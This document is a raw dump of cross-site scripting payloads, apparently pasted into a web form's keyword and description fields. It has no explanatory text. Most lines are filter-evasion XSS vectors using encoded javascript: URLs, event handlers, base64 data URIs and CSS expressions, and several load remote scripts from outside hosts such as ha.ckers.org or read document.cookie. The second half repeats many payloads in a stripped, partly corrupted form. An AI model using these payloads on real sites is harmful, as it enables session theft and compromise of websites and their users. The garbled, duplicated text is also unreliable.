DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\\\"></BODY></HTML>\\r\\n<SCRIPT>document.write(\\\"<SCRI\\\");</SCRIPT>PT SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<form id=\\\"test\\\" /><button form=\\\"test\\\" formaction=\\\"javascript:alert(123)\\\">TESTHTML5FORMACTION\\r\\n<form><button formaction=\\\"javascript:alert(123)\\\">crosssitespt\\r\\n<frameset onload=alert(123)>\\r\\n<!--<img src=\\\"--><img src=x onerror=alert(123)//\\\">\\r\\n<style><img src=\\\"</style><img src=x onerror=alert(123)//\\\">\\r\\n<object data=\\\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\">\\r\\n<embed src=\\\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\">\\r\\n<embed src=\\\"javascript:alert(1)\\\">\\r\\n<? foo=\\\"><script>alert(1)</script>\\\">\\r\\n<! foo=\\\"><script>alert(1)</script>\\\">\\r\\n</ foo=\\\"><script>alert(1)</script>\\\">\\r\\n<script>({0:#0=alert/#0#/#0#(123)})</script>\\r\\n<script>ReferenceError.prototype.__defineGetter__(\\\'name\\\', function(){alert(123)}),x</script>\\r\\n<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(\\\'alert(1)\\\')()</script>\\r\\n<script src=\\\"#\\\">{alert(1)}</script>;1\\r\\n<script>crypto.generateCRMFRequest(\\\'CN=0\\\',0,0,null,\\\'alert(1)\\\',384,null,\\\'rsa-dual-use\\\')</script>\\r\\n<svg xmlns=\\\"#\\\"><script>alert(1)</script></svg>\\r\\n<svg onload=\\\"javascript:alert(123)\\\" xmlns=\\\"#\\\"></svg>\\r\\n<iframe xmlns=\\\"#\\\" src=\\\"javascript:alert(1)\\\"></iframe>\\r\\n+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-\\r\\n%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-\\r\\n+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-\\r\\n%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-\\r\\n%253cscript%253ealert(document.cookie)%253c/script%253e\\r\\n“><s”%2b”cript>alert(document.cookie)</script>\\r\\n“><ScRiPt>alert(document.cookie)</script>\\r\\n“><<script>alert(document.cookie);//<</script>\\r\\nfoo<script>alert(document.cookie)</script>\\r\\n<scr<script>ipt>alert(document.cookie)</scr</script>ipt>\\r\\n%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E\\r\\n‘; alert(document.cookie); var foo=’\\r\\nfoo\\\\’; alert(document.cookie);//’;\\r\\n</script><script >alert(document.cookie)</script>\\r\\n<img src=asdf onerror=alert(document.cookie)>\\r\\n<BODY ONLOAD=alert(’XSS’)>\\r\\n<script>alert(1)</script>\\r\\n\\\"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>\\r\\n<video src=1 onerror=alert(1)>\\r\\n<audio src=1 onerror=alert(1)>\\r\\n\\\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\\\">\\\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\\r\\n\\\'\\\';!--\\\"<XSS>=&{()}\\r\\n0\\\\\\\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>\\\"-confirm(3)-\\\"\\r\\n<script/src=data:,alert()>\\r\\n<marquee/onstart=alert()>\\r\\n<video/poster/onerror=alert()>\\r\\n<isindex/autofocus/onfocus=alert()>\\r\\n<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>\\r\\n<IMG SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=javascript:alert(\\\'XSS\\\')>\\r\\n<IMG SRC=JaVaScRiPt:alert(\\\'XSS\\\')>\\r\\n<IMG SRC=javascript:alert(\\\"XSS\\\")>\\r\\n<IMG SRC=`javascript:alert(\\\"RSnake says, \\\'XSS\\\'\\\")`>\\r\\n<a onmouseover=\\\"alert(document.cookie)\\\">xxs link</a>\\r\\n<a onmouseover=alert(document.cookie)>xxs link</a>\\r\\n<IMG \\\"\\\"\\\"><SCRIPT>alert(\\\"XSS\\\")</SCRIPT>\\\">\\r\\n<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\\r\\n<IMG SRC=# onmouseover=\\\"alert(\\\'xxs\\\')\\\">\\r\\n<IMG SRC= onmouseover=\\\"alert(\\\'xxs\\\')\\\">\\r\\n<IMG onmouseover=\\\"alert(\\\'xxs\\\')\\\">\\r\\n<IMG SRC=/ onerror=\\\"alert(String.fromCharCode(88,83,83))\\\"></img>\\r\\n<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;\\r\\n&#39;&#88;&#83;&#83;&#39;&#41;>\\r\\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&\\r\\n#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\\r\\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\\r\\n<IMG SRC=\\\"jav ascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"jav&#x09;ascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"jav&#x0A;ascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"jav&#x0D;ascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\" &#14; javascript:alert(\\\'XSS\\\');\\\">\\r\\n<SCRIPT/XSS SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<BODY onload!#$%&()*~+-_.,:;?@[/|\\\\]^`=alert(\\\"XSS\\\")>\\r\\n<SCRIPT/SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<<SCRIPT>alert(\\\"XSS\\\");//<</SCRIPT>\\r\\n<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >\\r\\n<SCRIPT SRC=//ha.ckers.org/.j>\\r\\n<IMG SRC=\\\"javascript:alert(\\\'XSS\\\')\\\"\\r\\n<iframe src=http://ha.ckers.org/scriptlet.html <\\r\\n\\\\\\\";alert(\\\'XSS\\\');//\\r\\n</script><script>alert(\\\'XSS\\\');</script>\\r\\n</TITLE><SCRIPT>alert(\\\"XSS\\\");</SCRIPT>\\r\\n<INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<BODY BACKGROUND=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<IMG DYNSRC=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<IMG LOWSRC=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<STYLE>li {list-style-image: url(\\\"javascript:alert(\\\'XSS\\\')\\\");}</STYLE><UL><LI>XSS</br>\\r\\n<IMG SRC=\\\'vbscript:msgbox(\\\"XSS\\\")\\\'>\\r\\n<IMG SRC=\\\"livescript:[code]\\\">\\r\\n<BODY ONLOAD=alert(\\\'XSS\\\')>\\r\\n<BGSOUND SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<BR SIZE=\\\"&{alert(\\\'XSS\\\')}\\\">\\r\\n<LINK REL=\\\"stylesheet\\\" HREF=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<LINK REL=\\\"stylesheet\\\" HREF=\\\"http://ha.ckers.org/xss.css\\\">\\r\\n<STYLE>@import\\\'http://ha.ckers.org/xss.css\\\';</STYLE>\\r\\n<META HTTP-EQUIV=\\\"Link\\\" Content=\\\"<http://ha.ckers.org/xss.css>; REL=stylesheet\\\">\\r\\n<STYLE>BODY{-moz-binding:url(\\\"http://ha.ckers.org/xssmoz.xml#xss\\\")}</STYLE>\\r\\n<STYLE>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert(\\\"XSS\\\")\\\';</STYLE>\\r\\n<IMG STYLE=\\\"xss:expr/*XSS*/ession(alert(\\\'XSS\\\'))\\\">\\r\\nexp/*<A STYLE=\\\'no\\\\xss:noxss(\\\"*//*\\\");\\r\\nxss:ex/*XSS*//*/*/pression(alert(\\\"XSS\\\"))\\\'>\\r\\n<STYLE TYPE=\\\"text/javascript\\\">alert(\\\'XSS\\\');</STYLE>\\r\\n<STYLE>.XSS{background-image:url(\\\"javascript:alert(\\\'XSS\\\')\\\");}</STYLE><A CLASS=XSS></A>\\r\\n<STYLE type=\\\"text/css\\\">BODY{background:url(\\\"javascript:alert(\\\'XSS\\\')\\\")}</STYLE>\\r\\n<XSS STYLE=\\\"xss:expression(alert(\\\'XSS\\\'))\\\">\\r\\n<XSS STYLE=\\\"behavior: url(xss.htc);\\\">\\r\\n¼script¾alert(¢XSS¢)¼/script¾\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript:alert(\\\'XSS\\\');\\\">\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\">\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=javascript:alert(\\\'XSS\\\');\\\">\\r\\n<IFRAME SRC=\\\"javascript:alert(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<IFRAME SRC=# onmouseover=\\\"alert(document.cookie)\\\"></IFRAME>\\r\\n<FRAMESET><FRAME SRC=\\\"javascript:alert(\\\'XSS\\\');\\\"></FRAMESET>

keyword(s): z

description: \\\'\\\';!--\\\"<XSS>=&{()}\\r\\n<SCRIPT SRC=http://ha.ckers.org/xss.js>\\r\\n<IMG SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=(\\\'XSS\\\')>\\r\\n<IMG SRC=(\\\'XSS\\\')>\\r\\n<IMG SRC=(\\\"XSS\\\")>\\r\\n<IMG SRC=`(\\\"RSnake says, \\\'XSS\\\'\\\")`>\\r\\n<a =\\\"alert()\\\">xxs link</a>\\r\\n<a =alert()>xxs link</a>\\r\\n<IMG \\\"\\\"\\\">alert(\\\"XSS\\\")\\\">\\r\\n<IMG SRC=(String.fromCharCode(88,83,83))>\\r\\n<IMG SRC=# =\\\"alert(\\\'xxs\\\')\\\">\\r\\n<IMG SRC= =\\\"alert(\\\'xxs\\\')\\\">\\r\\n<IMG =\\\"alert(\\\'xxs\\\')\\\">\\r\\n<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\\r\\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\\r\\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\\r\\n<IMG SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"jav&#x09;ascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"jav&#x0A;ascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"jav&#x0D;ascript:alert(\\\'XSS\\\');\\\">\\r\\nperl -e \\\'print \\\"<IMG SRC=java\\\\0script:alert(\\\\\\\"XSS\\\\\\\")>\\\";\\\' > out\\r\\n<IMG SRC=\\\" &#14; (\\\'XSS\\\');\\\">\\r\\n<SCRIPT/XSS SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert(\\\"XSS\\\")>\\r\\n<SCRIPT/SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<alert(\\\"XSS\\\");//<\\r\\n<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >\\r\\n<SCRIPT SRC=//ha.ckers.org/.j>\\r\\n<IMG SRC=\\\"(\\\'XSS\\\')\\\"\\r\\n<iframe src=http://ha.ckers.org/scriptlet.html <\\r\\n\\\\\\\";alert(\\\'XSS\\\');//\\r\\n</TITLE>alert(\\\"XSS\\\");\\r\\n<INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n<BODY BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<IMG DYNSRC=\\\"(\\\'XSS\\\')\\\">\\r\\n<IMG LOWSRC=\\\"(\\\'XSS\\\')\\\">\\r\\n<STYLE>li {list-style-image: url(\\\"(\\\'XSS\\\')\\\");}</STYLE><UL><LI>XSS</br>\\r\\n<IMG SRC=\\\'(\\\"XSS\\\")\\\'>\\r\\n<IMG SRC=\\\"\\\">\\r\\n<BODY =alert(\\\'XSS\\\')>\\r\\n<BGSOUND SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n<BR SIZE=\\\"&{alert(\\\'XSS\\\')}\\\">\\r\\n<LINK REL=\\\"stylesheet\\\" HREF=\\\"(\\\'XSS\\\');\\\">\\r\\n<LINK REL=\\\"stylesheet\\\" HREF=\\\"http://ha.ckers.org/xss.css\\\">\\r\\n<STYLE>@import\\\'http://ha.ckers.org/xss.css\\\';</STYLE>\\r\\n<META HTTP-EQUIV=\\\"Link\\\" Content=\\\"<http://ha.ckers.org/xss.css>; REL=stylesheet\\\">\\r\\n<STYLE>BODY{:url(\\\"http://ha.ckers.org/xssmoz.xml#xss\\\")}</STYLE>\\r\\n<STYLE>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert(\\\"XSS\\\")\\\';</STYLE>\\r\\n<IMG STYLE=\\\"xss:expr/*XSS*/ession(alert(\\\'XSS\\\'))\\\">\\r\\nexp/*<A STYLE=\\\'no\\\\xss:noxss(\\\"*//*\\\");xss:ex/*XSS*//*/*/pression(alert(\\\"XSS\\\"))\\\'>\\r\\n<STYLE TYPE=\\\"text/javascript\\\">alert(\\\'XSS\\\');</STYLE>\\r\\n<STYLE>.XSS{background-image:url(\\\"(\\\'XSS\\\')\\\");}</STYLE><A CLASS=XSS></A>\\r\\n<STYLE type=\\\"text/css\\\">BODY{background:url(\\\"(\\\'XSS\\\')\\\")}</STYLE>\\r\\n<STYLE type=\\\"text/css\\\">BODY{background:url(\\\"(\\\'XSS\\\')\\\")}</STYLE>\\r\\n<XSS STYLE=\\\"xss:alert(\\\'XSS\\\'))\\\">\\r\\n<XSS STYLE=\\\"(xss.htc);\\\">\\r\\nalert(\\\'XSS\\\');\\r\\n<SCRIPT a=\\\">\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<SCRIPT =\\\">\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<SCRIPT a=\\\">\\\" \\\'\\\' SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<SCRIPT \\\"a=\\\'>\\\'\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<SCRIPT a=`>` SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<SCRIPT a=\\\">\\\'>\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n(\\\"<SCRI\\\");PT SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<A HREF=\\\"http://66.102.7.147/\\\">XSS</A>\\r\\n<A HREF=\\\"http://www.google.com\\\">XSS</A>\\r\\n<A HREF=\\\"http://1113982867/\\\">XSS</A>\\r\\n<A HREF=\\\"http://0x42.0x0000066.0x7.0x93/\\\">XSS</A>\\r\\n<A HREF=\\\"http://0102.0146.0007.00000223/\\\">XSS</A>\\r\\n<A HREF=\\\"htt p://6 6.000146.0x7.147/\\\">XSS</A>\\r\\n<iframe src=\\\" (1) \\\">\\r\\n<svg><style>{font-family:\\\'<iframe/=confirm(1)>\\\'\\r\\n<input/=\\\"(1)\\\"\\r\\n<sVg><scRipt >alert(1) {Opera}\\r\\n<img/src=`` =this.=confirm(1) \\r\\n<form><isindex formaction=\\\"(1)\\\"\\r\\n<img src=`` =alert(1) \\r\\n<script/ src=\\\'https://dl.dropbox.com/u/13018058/js.js\\\' / >\\r\\n<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?\\r\\n<iframe/src=\\\PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\">\\r\\n<script /**/>/**/alert(1)/**/</script /**/\\r\\n"><h1/=\\\'\\\alert(1)\\\'>\\r\\n<iframe/src=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\" >X</a\\r\\nhttp://www.google<script .com>alert)</script\\r\\n<a href=[�]\\\"� =prompt(1)//\\\">XYZ</a\\r\\n<img/src=@ = prompt(\\\'1\\\')\\r\\n<style/=prompt(\\\'XSS\\\')\\r\\n<script ^__^>alert(String.fromCharCode(49))</script ^__^\\r\\n</style ><script :-(>/**/alert)/**/</script :-(\\r\\n�</form><input type=\\\"date\\\" =\\\"alert(1)\\\">\\r\\n<form><textarea =\\\'\\\a\\\l\\\e\\\r\\\t(1)\\\'>\\r\\n<script /***/>/***/confirm(\\\'\\\a\\\l\\\e\\\r\\\t\\\ᑕ\\\1\\\ᑐ\\\')/***/</script /***/\\r\\n<iframe srcdoc=\\\'<body >\\\'>\\r\\n<a href=\\\"(0)\\\" = (1) >X</a>\\r\\n<script ~~~>alert(0%0)</script ~~~>\\r\\n<style/=<!-- > alert (1)>\\r\\n<///style///><span / =\\\'alert(1)\\\'>SPAN\\r\\n<img/src=\\\'http://i.imgur.com/P8mL8.jpg\\\' = prompt(1)\\r\\n"><svg><style>{-o-link-source:\\\'<body/=confirm(1)>\\\'\\r\\n <blink/ =prompt(1)> {Firefox & Opera}\\r\\n<marquee =\\\'(1)\\\'>^__^\\r\\n<div/style=\\\"width:confirm(1))\\\">X</div> {IE7}\\r\\n<iframe// src=(1)\\r\\n//<form/action=()><input/type=\\\'submit\\\'>//\\r\\n/*iframe/src*/<iframe/src=\\\"<iframe/src=@\\\"/=prompt(1) /*iframe/src*/>\\r\\n//|\\\\\\\\ <script //|\\\\\\\\ src=\\\'https://dl.dropbox.com/u/13018058/js.js\\\'> //|\\\\\\\\ </script //|\\\\\\\\\\r\\n</font>/<svg><style>{src:\\\'<style/=this.=confirm(1)>\\\'</font>/</style>\\r\\n<a/href=\\\"; (1)\\\"><input type=\\\"X\\\">\\r\\n</plaintext\\\\></|\\\\><plaintext/=prompt(1)\\r\\n</svg>\\\'\\\'<svg><script \\\'AQuickBrownFoxJumpsOverTheLazyDog\\\'>alert(1) {Opera}\\r\\n<a href=\\\"\\\alert(1)\\\"><button>\\r\\n<div =\\\'alert(1)\\\'>DIV</div>\\r\\n<iframe style=\\\"position:absolute;top:0;left:0;width:100%;height:100%\\\" =\\\"prompt(1)\\\">\\r\\n<a href=\\\"(1)\\\">X</a>\\r\\n<embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<var =\\\"prompt(1)\\\">On Mouse Over</var>\\r\\n<a href=()>Click Here</a>\\r\\n<img src=\\\"/\\\" =_=\\\" title=\\\"=\\\'prompt(1)\\\'\\\">\\r\\n<%<!--\\\'%>alert(1);</script -->\\r\\n<script src=\\\<svg/=\\\alert(1)>\\\">X</a\\r\\n<iframe/=\\\a\\\l\\\e\\\r\\\t(\\\'\\\a\\\') worksinIE>\\r\\n~\\\'\\\a\\\' ; \\\t\\\h\\\r\\\o\\\w ~ \\\t\\\h\\\i\\\s. \\\a\\\l\\\e\\\r\\\t(~\\\'\\\a\\\')</script U+\\r\\n<script/src=\\\PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\\r\\n<iframe src=\\\PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\">\\r\\n<script /**/>/**/alert(1)/**/</script /**/\\r\\n"><h1/=\\\'\\\alert(1)\\\'>\\r\\n<iframe/src=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\" >X</a\\r\\nhttp://www.google<script .com>alert)</script\\r\\n<a href=[�]\\\"� =prompt(1)//\\\">XYZ</a\\r\\n<img/src=@ = prompt(\\\'1\\\')\\r\\n<style/=prompt(\\\'XSS\\\')\\r\\n<script ^__^>alert(String.fromCharCode(49))</script ^__^\\r\\n</style ><script :-(>/**/alert)/**/</script :-(\\r\\n�</form><input type=\\\"date\\\" =\\\"alert(1)\\\">\\r\\n<form><textarea =\\\'\\\a\\\l\\\e\\\r\\\t(1)\\\'>\\r\\n<script /***/>/***/confirm(\\\'\\\a\\\l\\\e\\\r\\\t\\\ᑕ\\\1\\\ᑐ\\\')/***/</script /***/\\r\\n<iframe srcdoc=\\\'<body >\\\'>\\r\\n<a href=\\\"(0)\\\" = (1) >X</a>\\r\\n<script ~~~>alert(0%0)</script ~~~>\\r\\n<style/=<!-- > alert (1)>\\r\\n<///style///><span / =\\\'alert(1)\\\'>SPAN\\r\\n<img/src=\\\'http://i.imgur.com/P8mL8.jpg\\\' = prompt(1)\\r\\n"><svg><style>{-o-link-source:\\\'<body/=confirm(1)>\\\'\\r\\n <blink/ =prompt(1)> {Firefox & Opera}\\r\\n<marquee =\\\'(1)\\\'>^__^\\r\\n<div/style=\\\"width:confirm(1))\\\">X</div> {IE7}\\r\\n<iframe// src=(1)\\r\\n//<form/action=()><input/type=\\\'submit\\\'>//\\r\\n/*iframe/src*/<iframe/src=\\\"<iframe/src=@\\\"/=prompt(1) /*iframe/src*/>\\r\\n//|\\\\\\\\ <script //|\\\\\\\\ src=\\\'https://dl.dropbox.com/u/13018058/js.js\\\'> //|\\\\\\\\ </script //|\\\\\\\\\\r\\n</font>/<svg><style>{src:\\\'<style/=this.=confirm(1)>\\\'</font>/</style>\\r\\n<a/href=\\\"; (1)\\\"><input type=\\\"X\\\">\\r\\n</plaintext\\\\></|\\\\><plaintext/=prompt(1)\\r\\n</svg>\\\'\\\'<svg><script \\\'AQuickBrownFoxJumpsOverTheLazyDog\\\'>alert(1) {Opera}\\r\\n<a href=\\\"\\\alert(1)\\\"><button>\\r\\n<div =\\\'alert(1)\\\'>DIV</div>\\r\\n<iframe style=\\\"xg-p:absolute;top:0;left:0;width:100%;height:100%\\\" =\\\"prompt(1)\\\">\\r\\n<a href=\\\"(1)\\\">X</a>\\r\\n<embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<var =\\\"prompt(1)\\\">On Mouse Over</var>\\r\\n<a href=()>Click Here</a>\\r\\n<img src=\\\"/\\\" =_=\\\" title=\\\"=\\\'prompt(1)\\\'\\\">\\r\\n<%<!--\\\'%>alert(1);</script -->\\r\\n<script src=\\\<svg/=\\\alert(1)>\\\">X</a\\r\\n<iframe/=\\\a\\\l\\\e\\\r\\\t(\\\'\\\a\\\') worksinIE>\\r\\n~\\\'\\\a\\\' ; \\\t\\\h\\\r\\\o\\\w ~ \\\t\\\h\\\i\\\s. \\\a\\\l\\\e\\\r\\\t(~\\\'\\\a\\\')</script U+\\r\\n<script/src=\\\PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\\r\\n<iframe src=\\\PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\">\\r\\n<IFRAME SRC=\\\"(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<EMBED SRC=\\\PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"></EMBED>\\r\\n<SCRIPT a=\\\">\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<SCRIPT a=\\\">\\\" \\\'\\\' SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<SCRIPT \\\"a=\\\'>\\\'\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<SCRIPT a=\\\">\\\'>\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n(\\\"<SCRI\\\");PT SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<alert(\\\"XSS\\\");//<\\r\\n<\\\"\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83))//-->\\\">\\\'>alert(String.fromCharCode(88,83,83))\\r\\n\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83))//-->\\\">\\\'>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search\\r\\nalert(\\\"hellox worldss\\\")&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510\\r\\nalert(\\\"XSS\\\");&search=1\\r\\n0&q=\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert%2?8String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode?(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83)%?29//-->\\\">\\\'>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search\\r\\n<h1><font color=blue>hellox worldss</h1>\\r\\n<BODY =alert(\\\'hellox worldss\\\')>\\r\\n<input =write(XSS) autofocus>\\r\\n<input =write(XSS) autofocus><input autofocus>\\r\\n<body =alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>\\r\\n<form><button formaction=\\\"(XSS)\\\">lol\\r\\n<!--<img src=\\\"--><img src=x =alert(XSS)//\\\">\\r\\n<![><img src=\\\"]><img src=x =alert(XSS)//\\\">\\r\\n<style><img src=\\\"</style><img src=x =alert(XSS)//\\\">\\r\\n<? foo=\\\">alert(1)\\\">\\r\\n<! foo=\\\">alert(1)\\\">\\r\\n</ foo=\\\">alert(1)\\\">\\r\\n<? foo=\\\"><x foo=\\\'?>alert(1)\\\'>\\\">\\r\\n<! foo=\\\"[[[Inception]]\\\"><x foo=\\\"]foo>alert(1)\\\">\\r\\n<% foo><x foo=\\\"%>alert(123)\\\">\\r\\n<div style=\\\"font-family:\\\'foo ;color:red;\\\';\\\">LOL\\r\\nLOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>\\r\\n({0:#0=alert/#0#/#0#(0)})\\r\\n<svg xmlns=\\\"http://www.w3.org/2000/svg\\\">LOLalert(123)</svg>\\r\\n\\r\\n\\\\\\\\\\\";alert(\\\'XSS\\\');//\\r\\n</TITLE>\\r\\n<INPUT TYPE=\\\\\\\"IMAGE\\\\\\\" SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\">\\r\\n<BODY BACKGROUND=\\\\\\\"(\\\'XSS\\\')\\\\\\\">\\r\\n<BODY >\\r\\n\\r\\n\\r\\n<BGSOUND SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\">\\r\\n
\\r\\n<LAYER SRC=\\\\\\\"http://ha.ckers.org/scriptlet.html\\\\\\\"></LAYER>\\r\\n<LINK REL=\\\\\\\"stylesheet\\\\\\\" HREF=\\\\\\\"(\\\'XSS\\\');\\\\\\\">\\r\\n<LINK REL=\\\\\\\"stylesheet\\\\\\\" HREF=\\\\\\\"http://ha.ckers.org/xss.css\\\\\\\">\\r\\n<STYLE>@import\\\'http://ha.ckers.org/xss.css\\\';</STYLE>\\r\\n<META HTTP-EQUIV=\\\\\\\"Link\\\\\\\" Content=\\\\\\\"; REL=stylesheet\\\\\\\">\\r\\n<STYLE>BODY{:url(\\\\\\\"http://ha.ckers.org/xssmoz.xml#xss\\\\\\\")}</STYLE>\\r\\n\\r\\n<STYLE>li {list-style-image: url(\\\\\\\"(\\\'XSS\\\')\\\\\\\");}</STYLE>